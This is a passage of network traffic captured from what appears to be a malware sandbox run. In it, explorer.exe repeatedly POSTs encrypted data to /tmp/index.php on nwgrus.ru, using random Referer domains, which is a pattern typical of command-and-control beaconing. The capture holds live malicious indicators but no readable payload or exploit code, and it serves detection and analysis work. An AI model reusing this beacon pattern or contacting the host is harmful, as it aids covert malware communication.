Sep 30, 2024 15:38:01.858439922 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ejrqbeuhiivimsok.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 244 Host: nwgrus.ru
Sep 30, 2024 15:38:01.858463049 CEST	244	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 2b 2b b3 95 Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu++NAsW4qm+HC0IyF%(n]0tf']Yg[3tWQY!t9Oy_%k!i?QTA
Sep 30, 2024 15:38:03.027226925 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:02 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49717	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:38:03.036783934 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yanbtiwxewyyhy.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 200 Host: nwgrus.ru
Sep 30, 2024 15:38:03.036797047 CEST	200	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 71 5f c4 fd Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuq_H)ut8-XOps>9"FV'&;QA\~I1M"rmLXTfIZb6;Q
Sep 30, 2024 15:38:03.993493080 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:03 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49718	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:38:04.003530025 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://frpabbqmujgvx.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 190 Host: nwgrus.ru
Sep 30, 2024 15:38:04.003530025 CEST	190	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 47 17 e3 86 Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuGu9Nl2,?}{'g.fC~r9;12(T2<vj\J;5=x,&
Sep 30, 2024 15:38:04.966228008 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:04 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49719	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:38:04.983519077 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ybeufjfqrbhah.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 131 Host: nwgrus.ru
Sep 30, 2024 15:38:04.983542919 CEST	131	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 45 0d a5 f2 Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuE4Q^jk<dZ;cN5F#
Sep 30, 2024 15:38:05.963044882 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49720	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:38:06.002381086 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://astksdjaitsnxo.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 294 Host: nwgrus.ru
Sep 30, 2024 15:38:06.002381086 CEST	294	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 50 0f fd a9 Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuPk\|ttfy*kOBL#zXx6&~t5/54_qWd]nN1E.VyQj^Nrqi3=k
Sep 30, 2024 15:38:06.991324902 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49721	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:38:06.999398947 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ssdmhljrxull.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 309 Host: nwgrus.ru
Sep 30, 2024 15:38:06.999423981 CEST	309	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 22 31 a4 89 Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu"1ojpu((o/n-xJ>n=S#EOSQ0Az<o+XG6T3FMU9(*1w@=&0pzk,Q79
Sep 30, 2024 15:38:07.965688944 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:07 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49722	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:38:07.980631113 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mshenhcpddejse.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 328 Host: nwgrus.ru
Sep 30, 2024 15:38:07.980665922 CEST	328	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 37 05 a2 f5 Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu7oDXeA`oiN!qbw*>Mz)D,)`]<F_ fz4R/}%`y\| Ydc+&92w
Sep 30, 2024 15:38:08.937695026 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:08 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49723	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:38:08.952717066 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pjefvbuybfqlgx.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 362 Host: nwgrus.ru
Sep 30, 2024 15:38:08.952750921 CEST	362	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 32 22 b0 eb Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu2"bWQ{l!\Ym{W@_"X^>.e/n7!$-3z%Tz_:>wJ/bxBWU)jj]O
Sep 30, 2024 15:38:09.905338049 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:09 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49724	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:38:09.913422108 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fufaecmkeyed.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 205 Host: nwgrus.ru
Sep 30, 2024 15:38:09.913439989 CEST	205	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 64 0d ff 8e Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vudWDzd>K(~,i0EIFbD9Als':wuZIAS4moZgV'
Sep 30, 2024 15:38:10.884675980 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:10 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49725	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:38:10.893543959 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://naauncqsbvtxnxe.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 299 Host: nwgrus.ru
Sep 30, 2024 15:38:10.893594980 CEST	299	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 43 5e ee 9f Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuC^$AD4__F39qH/iVDrN8%1BS'6T> hfd-LO=Lh+6d#'zrPl9~ihqsE,
Sep 30, 2024 15:38:11.851602077 CEST	189	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:11 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	49728	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:38:16.487369061 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lcpcrwvedbvpllck.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 267 Host: nwgrus.ru
Sep 30, 2024 15:38:16.487404108 CEST	267	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 18 6b 2c 90 f4 76 0b 75 7e 3c e9 ac Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA ,[k,vu~<SaXZIgVg+:-CpR<_O@ERmA&,pT@P^9>B-kei!/.Q5b-0Nilutc%[+
Sep 30, 2024 15:38:17.653270006 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:17 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 